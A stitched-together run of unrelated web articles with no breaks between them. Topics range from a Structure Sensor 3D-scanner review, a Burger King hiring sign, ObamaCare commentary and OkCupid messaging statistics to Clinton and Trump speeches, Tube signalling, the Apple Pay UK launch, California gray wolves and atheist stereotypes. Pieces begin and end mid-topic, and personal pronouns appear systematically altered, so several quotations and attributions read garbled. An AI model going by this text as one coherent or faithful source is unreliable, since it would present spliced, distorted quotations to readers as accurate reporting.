Users interested in actually developing their own apps will no doubt get a lot out of the main Structure app, since it provides a good overview of the device's capabilities. However, aside from showing the sensor output and letting you update your Structure Sensor's firmware, the app doesn't really do anything. To actually make the scanner produce something, we need to either link it up to a desktop computer, or we need to fire up some additional apps.
Scanning stuff
Occipital provided us with several additional iOS apps to make the scanner actually do stuff. One, simply called "Scanner," allows you to slowly pan the Structure around an object to capture a 3D model of it. As you move, the iPad's display shows you the object you're scanning and a real-time point cloud of the object being scanned; the more you scan, the more the point cloud fills in with actual details. The app can then deliver (via e-mail) a Wavefront .obj file of the scanned object, which can then be cleaned up in any 3D application that supports .obj files. From there, you can use the scanned .obj in another 3D project or convert it to a format suitable for 3D printing.
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
However, by itself the scanner has no way to detect standard visible colors—it operates purely in the infrared. The .obj files it produces do not include any accompanying textures. To actually get a fully detailed scanned object, we need to turn to a different app: itSeez3D.
Like the default Structure app, itSeez3D combines the output of the Structure's infrared camera with the iPad's built-in color camera to simultaneously scan both an object's shape and also the visual details of its surface. Actually pulling a good scan requires a carefully prepared scanning surface with lots of details for the app to use for reference (the tutorial video recommends putting some magazines down around your object to create an appropriately busy visual area), but the results we got in several test scans were actually not terrible!
The most complex object we tried to scan was our loaner DJI Phantom 2 Vision+ quadcopter. The ventral surface of the drone has a lot of intricate detail, being taken up by the drone's integrated gimbal and video camera. itSeez3D managed to produce a somewhat-blobby but still clearly recognizable model of the drone.
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Steven Michael
Lee Hutchinson
We had less-stellar luck with the joystick from our Thrustmaster Warthog HOTAS setup. The joystick's black metallic surface didn't appear to throw back enough of an infrared reflection for the camera to see its projected infrared laser mesh. In spite of a lot of time spent scanning, we ended up with only a partial object.
Lee Hutchinson
Lee Hutchinson
We also found that the structured light scanning mesh can have a hard time picking up on small details, like the gooseneck on our Bona Vita electric kettle. Most of the rest of the kettle is modeled and textured correctly, but the neck appears to have been small enough to slip through the mesh and go unscanned.
Lee Hutchinson
Lee Hutchinson
We also tried wirelessly linking the main Structure app to Skanect, an application running on our desktop computer. When linked, Skanect was able to use the Structure sensor to capture an extremely wide and detailed swath of the real world—including my desk, my keyboard, my mouse, and some of my legs.
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
Leaving iOS and the nature of openness
Out of the box, you can immediately hook the Structure Sensor up to an iOS device, but what if Apple isn't your platform of choice? The Structure Sensor has a proprietary plug, and if you want to connect the Structure to an Android device (or to a Windows or OS X desktop), you'll need the $39 "Hacker Cable" accessory.
There appears to be a bit of a disconnect between the Structure Sensor's positioning as an open development platform and the requirement to purchase a proprietary cable to actually use the Structure on non-iOS devices. When we contacted Occipital and asked about this, a spokesperson sent us the following response:
The Hacker Cable is a USB 2.0 cable, but terminated on one end with the special connector that the Structure Sensor uses....We thought about using a micro USB connector for the sensor's data port, but unfortunately, these connectors simply don't have enough wires for us to support both iOS devices and USB devices, since the requirements are different for both. In order to make both work, we needed more than the four wires that micro USB connector is able to carry, and so we had to use a connector with more pins. Another option could have been to add two different data ports (one for Lightning, one for USB) on the sensor, but we felt this would have been confusing to users, and it would have added cost to the sensor itself, which everyone would have needed to pay, even if they only needed one of the two ports. In the end, we created a single data port that (we think) elegantly supports both Apple Lightning devices and standard USB devices.
The spokesperson also noted that the Hacker Cable will let the Structure Sensor parasitically charge while plugged in—something that the Lightning cable doesn't allow. Without the Hacker Cable, you need to plug the Structure into its included AC adapter to charge. This isn't a huge problem—after several hours of usage, the Structure was still reading over 50% of its battery capacity available. We were able to do the entire review on a single charge.
The takeaway: needs more apps
The Structure Sensor is really more of a greenfield development tool right now than it is a consumer device. It's got a huge amount of promise, but there aren't yet a lot of ways for normal folks to pick up and use the device (though if you've got access to a 3D printer, it's a cool way to quickly create 3D meshes from small objects).
Fortunately for Occipital, their smashing Kickstarter success has already shown that they have a large audience out there. The company is going to be somewhat dependent on that audience to drive further adoption—it seems, at least for now, that consumer-produced apps are going to be responsible for the bulk of the Structure Sensor's uses.
If you want to get your hands on one, they're available for sale at Structure.io. A bundle containing the Structure Sensor, a license for the pro version of the desktop Skanect application, an iPad bracket, and the Hacker Cable costs $499, while the sensor by itself costs $399. The devices are shipping now, but delivery times for non-Kickstarter customers are currently about 30 days.
A Burger King in Ephrata, Wash., recently posted the words "Now Hiring Must be Mexican" on its sign.
KFFM.com posted a picture of the sign and asked its readers, "I'm not exactly sure of the reasoning. Maybe none of the current staff can speak espanol or perhaps they need to fulfill their EEO report, I'm not exactly sure. What do you think? Do you find this sign offensive or are you okay with their honesty.”
So far, 82 percent of their readers say the sign is offensive, which seems to be the same percentage of people who have slammed Burger King on its official Facebook page.
The Facebook comments have included:
Tell all of Burger King to take their company to Mexico and abide by legal hiring practices here in the good ole USA – This is NOT MEXICO.
ADVERTISEMENT Thanks for watching! Visit Website
What's up with the racist sign? Now I know why I don't and never will eat at Booger King.
Your racist ways will lead to your demise. I saw your recent discriminatory chain advertisement about only hiring Mexicans. What about Blacks and Whites? Do we have a chance in this country anymore? I'm ashamed to have ever eaten at your establishment. Never again...
Sources: KFFM.com and Facebook
undefined
A Scottish ‘aurora hunter' captured amazing new pictures of the Northern Lights – thanks to an early hour loo trip.
Charlie Davidson, from Peterhead, has been photographing the beautiful natural phenomenon for two years.
But within five hours of arriving in Finland, the 45-year-old was looking at one of the most amazing displays of the lights in their career.
Please enable Javascript to view this gallery
Oil industry worker Charlie has already been to Iceland and recently travelled to Utsjoki, in the far north of Finland.
They arrived around 10pm but thick cloud developed within an hour and they went to bed.
They said: “I woke up around 3am and got up to go to the toilet, I took a quick look out the window and the aurora was there again so I got dressed and went out with my camera.”
They have a whole heap of regulations still left to write (at least $1.4 billion in annual compliance costs' worth, by one estimate), but the employer mandate was part of the actual text of the law. Where is it written that they can just make at-will changes ad infinitum? Watch it at RCP:
Generally speaking, you get past the next election by changing your policies, by announcing new initiatives, but not by wantonly changing the law, lawlessly. I mean, this is stuff that you do in a banana republic. It's as if the law is simply a blackboard on which Obama writes any number they want, any delay they want and any provision. It's now reached a point where it is so endemic that nobody even notices or complains. I think if the complaints had started with the first arbitrary changes, and these are are not adjustments or transitions. These are political decisions to minimize the impact leading up to an election, and it's changing the law in a way that you are not allowed to do. … It's not incompetence. Willful breaking of the constitutional order — where in the Constitution is the president allowed to alter a law 27 times after it's been passed?
And besides the utter lawlessness of the whole thing, there's still the question of the tangible price of the White House's non-legislative mood swings: After the Obama administration's initial employer-mandate suspension through 2015 that they made back in July, the CBO estimated that it would add an additional $12 billion onto the total cost of ObamaCare because employers wouldn't be paying penalties (i.e., taxes) on not insuring people, while more people would likely need to seek subsidized insurance through the exchanges because their employers wouldn't be required to offer it yet. Won't delaying the employer mandate again add at least ten billion or so more onto the total ObamaCare price tag? Especially if the Obama administration does decide to go through with the rumored (and, incidentally, also lawless) three-year extension of the “if you like your plan, you can keep it” fix for the cancelled plans in the individual market, doesn't that all increase the likelihood of major “risk corridor” bailouts and/or the law's fiscal implosion? What is going on?!
Exactly What To Say In A First Message
There's more to it than you think
OkCupid Blocked Unblock Follow Sep 13, 2009
Ok, here's the experiment. We analyzed over 500,000 first contacts on our dating site, OkCupid. Our program looked at keywords and phrases, how they affected reply rates, and what trends were statistically significant. The result: a set of rules for what you should and shouldn't say when introducing yourself. Online dating advice at its best. Let's go:
Rule 1: Be literate
Netspeak, bad grammar, and bad spelling are huge turn-offs. Our negative correlation list is a fool's lexicon: ur, u, wat, wont, and so on. These all make a terrible first impression. In fact, if you count hit (and we do!) the worst 6 words you can use in a first message are all stupid slang.
Language like this is such a strong deal-breaker that correctly written but otherwise workaday words like don't and won't have nicely above average response rates (36% and 37%, respectively).
Interesting exceptions to the “no netspeak” rule are expressions of amusement. haha (45% reply rate) and lol (41%) both turned out to be quite good for the sender. This makes a certain sense: people like a sense of humor, and you need to be casual to convey genuine laughter. hehe was also a successful word, but much less so (33%). Scientifically, this is because it's a little evil sounding.
So, in short, it's okay to laugh, but keep the rest of your message grammatical and punctuated.
Rule 2: Avoid physical compliments
Although the data shows this advice holds true for both sexes, it's mostly directed at guys, because they are way more likely to talk about looks. You might think that words like gorgeous, beautiful, and sexy are nice things to say to someone, but no one wants to hear them. As we all know, people normally like compliments, but when they're used as pick-up lines, before you've even met in person, they inevitably feel…ew. Besides, when you tell a woman she's beautiful, chances are you're not.
On the other hand, more general compliments seem to work well:
The word pretty is a perfect case study for our point. As an adjective, it's a physical compliment, but as an adverb (as in, “I'm pretty good at sports.”) it's is just another word.
When used as an adverb it actually does very well (a phenomenon we'll examine in detail below), but as pretty‘s uses become more clearly about looks, reply rates decline sharply. You're pretty and your pretty are phrases that could go either way (physical or non-). But very pretty is almost always used to describe the way something or someone looks, and you can see how that works out.
Rule 3: Use an unusual greeting
We took a close look at salutations. After all, the way you choose to start your initial message to someone is the “first impression of your first impression.” The results surprised us:
The top three most popular ways to say “hello” were all actually bad beginnings. Even the slangy holla and yo perform better, bucking the general “be literate” rule. In fact, it's smarter to use no traditional salutation at all (which earns you the reply rate of 27%) and just dive into whatever you have to say than to start with hi. I'm not sure why this is: maybe the ubiquity of the most popular openings means people are more likely to just stop reading when they see them.
The more informal standard greetings: how's it going, what's up, and howdy all did very well. Maybe they set a more casual tone that people prefer, though I have to say, You had me at ‘what's up' doesn't quite have the same ring to it.
Rule 4: Bring up specific interests
There are many words on the effective end of our list like zombie, band, tattoo, literature, studying, vegetarian (yes!), and metal (double yes!) that are all clearly referencing something important to the sender, the recipient, or, ideally, both. Talking about specific things that interest you or that you might have in common with someone is a time-honored way to make a connection, and we have proof here that it works. We're presenting just a smattering: in fact every “niche” word that we have significant data on has a positive effect on messaging.
Even more effective are phrases that engage the reader's own interests, or show you've read their profile:
Rule 5: If you're a guy, be self-effacing
Awkward, sorry, apologize, kinda, and probably all made male messages more successful, yet none of them except sorry affects female messages. As we mentioned before, pretty, no doubt because of its adverbial meaning of “to a fair degree; moderately” also helps male messages. A lot of real-world dating advice tells men to be more confident, but apparently hemming and hawing a little work well online.
It could be that appearing unsure makes the writer seem more vulnerable and less threatening. It could be that women like guys who write mumbly. But either way: men should be careful not to let the appearance of vulnerability become the appearance of sweaty desperation: please is on the negative list (22% reply rate), and in fact it is the only word that is actually worse for you than its netspeak equivalent (pls, 23%)!
Rule 6: Consider becoming an atheist
Mentioning your religion helps you, but, paradoxically, it helps you most if you have no religion. We know that's going to piss a lot of people off, and we're more or less tongue-in-cheek with this advice, but it's what the numbers say.
These are the religious terms that appeared a statistically significant number of times. Atheist actually showed up surprisingly often (342 times per 10,000 messages, second only to 552 mentions of christian and ahead of 278 for jewish and 142 for muslim).
Though very few people actually do it, invoking the sky-breaking thunderbolts of zeus does help a person get noticed (reply rate 56%), but maybe that shouldn't be a surprise on a site that is itself named for a member of the Classical pantheon. So if you can't bring yourself to deny the deity, consider opening yourself up to a whole wacky bunch of them. But ideally you should just disbelieve the whole thing. It can help your love life, and, besides, if there really was a god, wouldn't first message always get a reply?
Hillary Clinton returned to the campaign trail Thursday to try pinning a racist tag on Donald Trump, accusing them of “taking hate groups mainstream” -- while Trump accused their opponent of "lies" and "smears," and labeling "decent Americans as racists."
The Democratic nominee, who has spent the last week fundraising at private donor events, used a Reno, Nev., speech to pointedly accuse Trump of building a campaign on "prejudice and paranoia."
“He's taking hate groups mainstream and helping a radical fringe take over one of America's two major political parties,” they said, in perhaps their toughest speech yet about their Republican opponent.
Clinton accused their rival of having a history of racial discrimination and a connection to conspiracy theories, including the "racist" claim that President Obama was not born in the United States. They also claimed that Trump's businesses discriminated against African-Americans and Hispanics.
“A man with a long history of racial discrimination, who traffics in dark conspiracy theories drawn from the pages of supermarket tabloids and the dark, far reaches of the Internet, should never run our government or command our military,” they said.
Trump, though, tried to preempt the attacks during an address just minutes earlier in Manchester, N.H.
“When Democratic policies fail, they are left with only this one tired argument – you're a racist, racist, race, it's a tired, disgusting argument and so totally predictable. It's the last refuge of the discredited politician,” Trump said.
They accused Clinton of painting everyday Americans as racist, saying: “She lies, they smear, they paint decent Americans – you -- as racists.”
They went on to criticize Democrats in general for their leadership of the inner cities, which they said has hurt African-American communities. “For fifty years, people living in our inner cities have suffered under a failed policy regime. But the Democratic politicians – who only want to please media executives and Wall Street donors – do nothing but expand the hurt and the suffering that our inner cities and our country is going through right now.”
The comments were part of Trump's stepped-up outreach to minority voters -- which Clinton cast in their address as disingenuous.
They also slammed Trump's decision to make Breitbart News' Steve Bannon their campaign CEO, pointing to headline the site has published, including: “Birth Control Makes Women Unattractive and Crazy” and “Would You Rather Your Child Had Feminism or Cancer?”
They said that Bannon's hire represented a victory for a fringe conservative movement called the “alt-right” – a movement Clinton described as a racist ideology.
“The de facto merger between Breitbart and the Trump Campaign represents a landmark achievement for the alt-right.' A fringe element has effectively taken over the Republican Party.”
A web video released earlier in the day also pointed to a number of white supremacists who have backed Trump's campaign, including former Ku Klux Klan Grand Wizard David Duke. A Trump supporter called the ad "revolting."
Clinton's return to the campaign trail comes after a week of fundraising, amid growing questions surrounding the connection between the Clinton Foundation and the State Department when Clinton served as the country's top diplomat.
An Associated Press investigation showed that more than half of the people outside government who met with Clinton while they were serving as secretary of state gave money to the Clinton Foundation. The campaign has said that the numbers were cherry-picked to make Clinton look bad.
Before tackling Clinton's racism charges, Trump used their remarks in Manchester to amplify their attacks on the foundation.
“This week the curtain was lifted. The corruption was revealed for all to see. The veil was pulled back on a vast criminal enterprise run out of the State Department by Hillary Clinton,” they said.
“It is hard to tell where the Clinton Foundation ended, and where the State Department began,” they said. “It's called pay-for-play.”
*Ahem*So, remember this ? Considering Sunset Shimmer's personality in the movie, I was greatly intrigued by that picture. It made me wonder what really happened when they first arrived in the human version of Equestria. I was even more perplexed when I heard digibrony's thoughts on Sunset. It seems like there's more to them than meets the eye.Er, anyway, I thought I would try to complete the portrait in vector format. Do with it what you will, just give credit please! And PLEASE feel free to offer suggestions if you think I screwed up on their lower half.Inkscape SVG: [Link] Plain SVG: [Link] Mostly traced from this screenshot: [Link] Don't know what Ponyscape is? Well, you'll need it, if you want to get the most out of the SVG I've provided. You can learn all about that at this group:Fixed their eyes and some other things with the helpful suggestions of , and redditor Fringe Pioneer -------------------------My Little Pony: Equestria Girls belongs to Hasbro
Around 400 African migrants are estimated to have made it onto Spanish soil after scaling a barbed-wire fence into Spain's North African enclave of Ceuta, which borders Morocco.
One group euphorically shouted “España”, some even performing cartwheels as they were filmed by local TV cameras immediately after arriving.
It's said to be the biggest break-in to the territory in over a decade.
The government said most were taken to a temporary migrant detention centre to have their legal status clarified.
Others who tried to climb the six-metre high fence were filmed perched on top. Several hundred who attempted to cross didn't make it.
By late morning an estimated 20 percent of those who did succeed in entering had not been located. The migrants who managed to breach the barrier did so using wire cutters or sharp objects in at least two sections of the fence.
Most of them are without papers and thought to come from sub-Saharan African. They were given food at the temporary centre, where a scramble suggested many were indeed hungry.
The Red Cross says it treated over 100 migrants. Some 25 people were taken to hospital with light injuries.
In theory they have the right to claim asylum, but Amnesty International has accused the authorities of illegally sending people back, giving them no chance to do so.
Spain's two North African enclaves of Ceuta and Melilla are often used as entry points into Europe. Some migrants try to swim along the coastline, or to cross by boat from Morocco into southern Spain – though tighter controls by both countries have resulted in fewer people attempting this route.
ES News Email Enter your email address Please enter an email address is invalid Fill out this field Email address is invalid You already have an account. Please log in or register with your social account
Londoners will reap the benefits of a vastly improved service across a swathe of three major Tube lines from 2018 as a £5.4 billion transformation is rolled out.
Transport for London is installing a new computer-based signalling system that will eventually mean smoother journeys across almost half the London Underground network.
And from early summer, commuters using the Circle and Hammersmith & City lines will enjoy a more reliable service and better customer information between Hammersmith and Euston Square.
Passengers on the Metropolitan line also will see an improvement between Finchley Road and Euston Square.
The new system – created by innovative French transport company Thales – will ultimately meaning more frequent trains and create space for hundreds of thousands more people.
Over the next five years, changes will be implemented across the Circle, District, Hammersmith & City and Metropolitan lines, encompassing 113 stations and involving 192 brand new S stock trains, with a new control centre operating from Hammersmith.
Trains will eventually run closer together resulting in shorter waiting times and allowing more people to be carried, TfL said.
Between 28 and 32 trains will run on each line per hour in central London.
During peak times, this will create space for 17,500 more people every hour on the Circle and Ham & City, 10,000 on the District and 9,000 on the Metropolitan line.
TfL said the Four Lines Modernisation project, which has now been successfully tested, will enable it to reduce delays and improve reliability.
Mark Wild, the Managing Director of London Underground, said of the trial: “The completion of this testing is a fantastic step forward in the vital programme to modernise nearly half of the Tube network.
“The new signalling system will provide our customers with more frequent trains and quicker journeys, as well as improving reliability and improving customer information.
“We are making improvements for our customers all over the network and this programme represents a hugely significant part of that work.”
The four lines are among some of the oldest sections of the Underground network, with parts dating back to 1863. They make up 40 per cent of the Tube network, with around a million passenger journeys each day.
TfL said old and worn out track and points will also be replaced, meaning journeys will be quieter and smoother.
It added that a new drainage system, which will make the track less likely to flood so that there are fewer signal failures and closures for repair work, will make the network more reliable during bad weather.
The first section of the network to experience benefits from next year will be between Hammersmith and Edgware Road where testing has recently been completed.
The project will continue until 2023, with more frequent services being introduced in central London from 2021.
Sandwiches have just got a whole lot easier to buy.
Apple Pay – the contactless payment system in all iPhone 6s and Apple Watches – has just launched in the UK. With 74.5 million iPhones sold last quarter, and millions of Apple Watches sold to date, a lot of people are ready to buy a halloumi and spinach wrap with their phone today.
At least, in theory.
By analyzing 26,000 online mentions of the Apple Watch UK launch, we've assembled a focus group of 15,789 people.
We've learned about their spending habits – and that, on the whole, it's not working so well.
Breaks the banks
Is the the first step in Apple's financial services takeover?
Certainly, the ease of use and ubiquity of Apple Pay is making brick-and-mortar banks much less necessary. Why carry around an extra card when you've got your phone on you anyway?
“Your verified fingerprint is your ID, or you can take a photo of your license, Cash is transferred digitally. Checks can be deposited with your iPhone,” writes Andrew Finn of Wait But Why. “Every one of the 500m iPhones is a bank branch.”
It's a matter of time until no bank branches exist at all.
In the UK, 14 banks have confirmed they'll be using the service. On Tuesday, the service launched with support for five banks.
HSBC was originally slated to be in the first batch, but slipped back due to technical difficulties. It didn't escape unscathed, with negative mentions outweighing positive ones 5:1.
Banks which launched on Monday, however, have mad a much more favorable response. All of them – except Santander – have seen an over 50% positive reaction.
NatWest has been the consumers' favorite. With 583 NatWest customers tweeting about their use of Apple Pay, it's had double the uptake of its nearest competitor: RBS.
RBS itself has 226 unique authors, Nationwide has 158, Santander has 123, and Ulster Bank of Northern Ireland has 51.
Outlets
Shops don't have the same support issue that banks do. If the shop you're in has a contactless card reader, you can use Apple Pay.
The most popular use of Apple Pay in the UK, so far, is on Transport for London's bus, tube and rail network. People use it for TfL twice as much as Pret.
TfL, Pret, Waitrose, Tesco and Boots are the top five brands with the most Apple Pay evangelists. Nando's, Co-op, Subway, McDonald's and Starbucks have the least.
“We're surprised to see Nando's – a typically strong brand on social media – gain so few Apple Pay mentions,” said Natalie Meehan, Brandwatch's Marketing Insights Analyst. “It's fitting with our research that Nando's is frequented by only the cheekiest of lads who can't afford Apple Watches.”
Teething trouble?
Rory Kellan-Jones, the BBC's technology correspondent described the service as having “wrinkles.” They couldn't use their iPhone to buy a small latte in the Café Nero next to the BBC's W1A HQ. The video has been shared widely on social media. But that's just one person.
We analyzed over 26,000 tweets for this short study. 10% of them are about how people can't get the service to work.
“Technology like this lives or dies on word of mouth,” Meehan said. “Apple Pay is positioned as being the fastest and easiest way to pay. If you think there's a 50% chance it could fail, you'll just reach for your credit card instead.”
Retailers are getting caught in the firing line, too. When it comes to them, negative mentions almost outweigh positive ones.
Some customers are complaining they have been charged twice, while others complain that their local stores don't have contactless readers yet.
Launching a service like Apple Pay involves a lot of big name stakeholders. If one link in tarnished, it casts doubt on the whole system.
Getting a holistic view of customer opinions is vital. “One million halloumi wraps bought with Apple Watch” is a great headline, but it doesn't tell the story of cursing into a Yoga Bunny Detox after the second failed payment attempt.
You can keep up to date by following @BW_React, serving up hourly social data charts, facts and diagrams.
For full data, please email react@brandwatch.com for a quick response.
0 Shares
We are just past the 2017 summer solstice (June 20 and 21 were the longest days of the year for anyone living north of the equator), and amid the celebrations, pagan rituals, and Stonehenge treks, there were many who performed a trick seemingly unique to that day.
According to some, eggs and brooms can somehow be balanced on their ends on that day (and/or on the vernal equinox, when day and night length are about the same; and/or on the first day of Spring, take your pick). YouTube videos can be found of many people trying this quirk for themselves, mostly successfully (videos showing the trick not working are of course less popular and interesting). The British tabloid The Daily Mirror–a reliable source for unreliable, sensationalized information since 1903–offered a story about goofy beliefs about the equinox including that eggs and brooms can be balanced on that day.
For many it does indeed work, though there's no scientific reason why it should only work on that day. Martin Gardner, writing in the May/June 1996 Skeptical Inquirer about the myth that egg balancing can only be done on the first day of Spring (a tradition they trace back to ancient China) explains that “Such self-deception is not hard to understand. If you are convinced that an egg will balance more easily on a certain day you will try a little harder, be more patient, and use steadier hands. If you believe that eggs won't balance on other days, this belief is transmitted subconsciously to your hands. It's the old Ouija-board phenomenon.”
The same is of course true for balancing a broom or anything else; if you are convinced it can only happen one day a year, you are unlikely to try at other times of the year (and realize it works then as well). For more on this phenomenon, see my Skeptical Inquiree column “Egging the Equator” in the July/August 2016 issue of Skeptical Inquirer magazine.
This story has been repeatedly debunked, but I figured I'd give it a shot myself–making sure not to try it on any of the afore-mentioned magical days–when it should be utterly impossible because Unspecified Reasons. You can see the results for yourself.
HBO has offered up official details and casting information on the highly anticipated True Detective Season 2. It was previously announced that Colin Farrell and Vince Vaughn have been cast as two of four lead characters in the story. We've now learned that Taylor Kitsch and Rachel McAdams have been confirmed, along with Kelly Reilly.
True Detective Season 2 comes with the logline, “Three police officers and a career criminal must navigate a web of conspiracy in the aftermath of a murder.” Below, you will find the main character details and new plot information thanks a press release from HBO.
Colin Farrell as Ray Velcoro, a compromised detective whose allegiances are torn between their masters in a corrupt police department and the mobster who owns him. Vince Vaughn as Frank Semyon, a criminal and entrepreneur in danger of losing their empire when their move into legitimate enterprise is upended by the murder of a business partner. Rachel McAdams as Ani Bezzerides, a Ventura County Sheriff's detective whose uncompromising ethics put them at odds with others and the system they serve. Taylor Kitsch as Paul Woodrugh, a war veteran and motorcycle officer for the California Highway Patrol, running from a difficult past and the sudden glare of a scandal that never happened. Kelly Reilly as Jordan, Frank Semyon's wife, a former D-list actor who is a full partner in their enterprises and ambitions.
I can't wait to see what series creator Nic Pizzolatto has come up with for this. Shooting on True Detective Season 2 is already underway in California. The second season will consist of eight hourlong episodes, and Justin Lin is directing the first two installments.
The California Department of Fish and Wildlife (CDFW) has confirmed the presence of two gray wolves in western Lassen County.
After a wolf-like canid was photographed by trail cameras in Lassen County in fall 2015 and spring 2016, CDFW began operating additional trail cameras in the area and regularly searching for wolf scat and tracks. This summer, photographs, tracks and eyewitness sightings suggested the presence of two canids frequently traveling together.
Numerous scat samples were collected by CDFW scientists and submitted to the University of Idaho's Laboratory for Ecological, Evolutionary and Conservation Genetics. Genetic analysis of the samples confirmed the presence of a male and a female gray wolf. There is no current evidence — such as trail camera images, tracks, scat or reported observations — suggesting the wolves produced pups this year.
Analysis of scat indicates that the male wolf was born into the Rogue Pack in 2014, and most likely dispersed to Lassen County in late 2015 or 2016. The founder of the Rogue Pack is the well-known gray wolf OR7 (collared in Oregon by the Oregon Department of Fish and Wildlife) who dispersed from northeast Oregon and traveled around northern California in 2011 and 2012 before eventually finding a mate and establishing a territory in southern Oregon in 2013.
The DNA of the female wolf does not match that of any known individual wolves from Oregon, and initial analyses indicates they are not a close relative of current Oregon wolves. Dispersing wolves have commonly been documented to travel great distances, and it is possible that they dispersed from another western state. The collection of higher-quality genetic samples may eventually lead to a better understanding of their origin.
Gray wolves were eliminated from California more than 100 years ago, until the return of OR7 in 2011. In May and July 2015, a trail camera in Siskiyou County captured images of a single adult, black wolf. Additional cameras were placed in the vicinity and in August 2015 images of two separate adult black wolves and five pups were captured. CDFW designated these animals the Shasta Pack. Until confirmation of the pair of wolves in Lassen County, these were the only wolves known to occur in California.
According to strategies identified within CDFW's draft Conservation Plan for Gray Wolves in California, CDFW will continue to assess and monitor gray wolves in California. If the pair documented in Lassen County continues to stay in the region, monitoring may include capturing at least one of the two and fitting it with a satellite-based GPS transmitter.
“The purpose of collaring gray wolves is to understand some key biological parameters such as habitat use, prey preferences and reproduction, as well as to potentially minimize wolf-livestock conflicts” said Karen Kovacs, a CDFW Wildlife Program Manager who has studied the wolves. “Due to concerns for the welfare of wolves, capturing them is generally not feasible in cold weather. Therefore, we would not attempt to capture and collar the wolves until late spring at the earliest.”
Gray wolves are currently listed as endangered both federally and within the state of California. The U.S. Fish and Wildlife Service and CDFW have no plans to reintroduce gray wolves into California. CDFW's draft Conservation Plan for Gray Wolves is available at www.wildlife.ca.gov/conservation/mammals/gray-wolf.
###
Media Contacts:
Karen Kovacs, CDFW Northern Region, (530) 225-2312
Jordan Traverso, CDFW Communications, (916) 212-7352
Atheist — does the word give you pause? Make your eyes narrow a bit? Conjure up images of immorality and pugnacious heathens? For a surprising number of Americans, the answer is still, well, yes.
According to data from a recent Pew study, while political polariziation is at its highest intensity in 20 years, the person Americans really don't want their family members bringing home for dinner is neither a Republican nor Democrat. It's someone who doesn't believe in God.
Yes, according to Pew, while less than 10% of Americans said they would be displeased if a family member married someone from an opposing political party, nearly half said they would be unhappy if a non-believer joined the family. Atheists are in a fairly exclusive club. They draw more negative attention than approval ratings for gun owners (19%), people without a college education (14%), those of a different race (11%) and born-again Christians (9%).
Atheism acrimony is not a new thing, but it's becoming more and more visible due to the rapidly rising number of atheists. Between 2007 and 2012, the number of respondents Pew classified as "religiously unaffiliated" increased from just over 15% of the American population to close to 20% of all U.S. adults (13 million of whom are self-described atheists and agnostics, and nearly 33 million people say they have no particular religious affiliation).
The conservative media is a cheerleader of the "aggressive atheist" archetype, especially around Christmas, when the airwaves are inevitably filled with stories warning that these millions of Americans are part of an army waging war on Christian holidays.
The Daily Show
Get More: Daily Show Full Episodes,Indecision Political Humor,The Daily Show on Facebook
But while the myth that atheists are heartless Grinches who want to destroy Christmas is popular, it is only one of many stereotypes that give atheists a bad rap. Loosely defined as all those who do not believe in the presence of God or similar spiritual beings, atheists are, in fact, a diverse group motivated by variety of personal reasons and belief systems.
Here are seven of the more prominent, problematic stereotypes about atheists:
1. Atheists are pacifists who don't fight America's wars.
This myth has remained popular, and is often repackaged as the phrase, "There are no atheists in foxholes." That quote, popularized after World War II, is often attributed to President Dwight D. Eisenhower and has been used to imply that atheists are cowardly, inclined to pacifism or, in some cases, find God while serving in war zones.
However, atheists have long objected to the sentiment.he Military Religious Freedom Foundation has gone so far as to request the Air Force remove an article from an Air Force-affiliated website for "publicly denigrat[ing] those without religion."
Meanwhile, it's a fallacy to suggest that the nonreligious don't serve in the armed forces, just as it is incorrect to equate atheism with pacifism. American hero Arizona Cardinals safety Pat Tillman was not known to be religious, a fact that Tillman family members later said was used against them as they sought answers regarding their death by friendly fire.
2. Atheists are all white men.
For those wishing to minimize the movement, the narrative of atheists being a small fringe group of white, privileged, Ivory tower academics would be popular. But while it's true that some of the most prominent — and controversial — atheists are white men, Christopher Hitchens and Richard Dawkins and are not emblematic of the entire group.
Studies show that men are more likely than women to call themselves religiously unaffiliated. But that's not the whole story. As this New York Times story states, respected atheists include both minorities and women. Just look at Jamila Bey, an African-American woman and journalist who speaks often on the topic.
"African-Americans have allowed the story to be told that we are a God-fearing people. Our culture dictates — mandates, even — that we be spiritual," Bey told the Root in 2011. "Accepting that definition of who we are forces us to defend our blackness should we have doubts about spirituality. [Accepting that definition means accepting that to be] authentically black is to be religious — wrongly — and that to doubt God is a white thing — wrongly. We let others define us, and we dare not buck that expectation."
3. Atheists are immoral hedonists.
Ah, the immorality stereotype. This is perhaps the laziest of the myths surrounding atheism. It stems from the wrong-headed notion that only a belief in God can ensure one's moral compass stays intact. But while the Bible, Torah, Quran and other holy books often include spiritually based directions for ways adherents can live moral lives, they are also full of outdated, or, especially in the case of the Old Testament, brutal guidelines that advocate for things like sexual slavery and stoning as a punishment for adultery.
Furthermore, as Amanda Marcotte points out, the argument that atheists must be morally untethered has a rather unsettling side effect:
"Believers, listen to me carefully when I say this: When you use this argument, you terrify atheists. We hear you saying that the only thing standing between you and Ted Bundy is a flimsy belief in a supernatural being made up by pre-literate people trying to figure out where the rain came from. This is not very reassuring if you're trying to argue from a position of moral superiority."
4. Atheists are arrogant and aggressive proselytizers.
This myth has picked up steam due to the growing popularity of an offshoot of atheism, commonly known as "New Atheism." As Dr. James Bradford, general secretary for Assemblies of God, accused recently, "New atheism is making science the enemy of religion." Richard Dawkins is perhaps one of the most infamous of these New Atheists, eager to debate all comers. "I'm quite keen on the politics of persuading people of the virtues of atheism," Dawkins said in 2006.
But while Dawkins employs a particularly brash style of discourse, the desire to educate and engage those with differing belief systems is not inherently a sign of arrogance. Indeed, evangelizing has been a hallmark of the Christian faith as it draws inspiration from the Bible itself and is reiterated in the words of venerable leaders as Pope John Paul II. "The mission of Christ the Redeemer, which is entrusted to the Church, is still very far from completion," John Paul II wrote. "As the second millennium after Christ's coming draws to an end, an overall view of the human race shows that this mission is still only beginning and that we must commit ourselves wholeheartedly to its service." Despite the strong wording, the beloved former pontiff (now saint) is not generally characterized as either arrogant or aggressive. Seems like a bit of a double standard.
5. Atheists are angry at God and want to destroy religion.
The "angry atheist" trope is one that has persisted despite very little evidence — anecdotal or otherwise — to back it up. The myth has been extended to suggest that atheists are not just angry people, but people who are angry with God. This anger, the theory holds, motivates atheists to want to destroy religion.
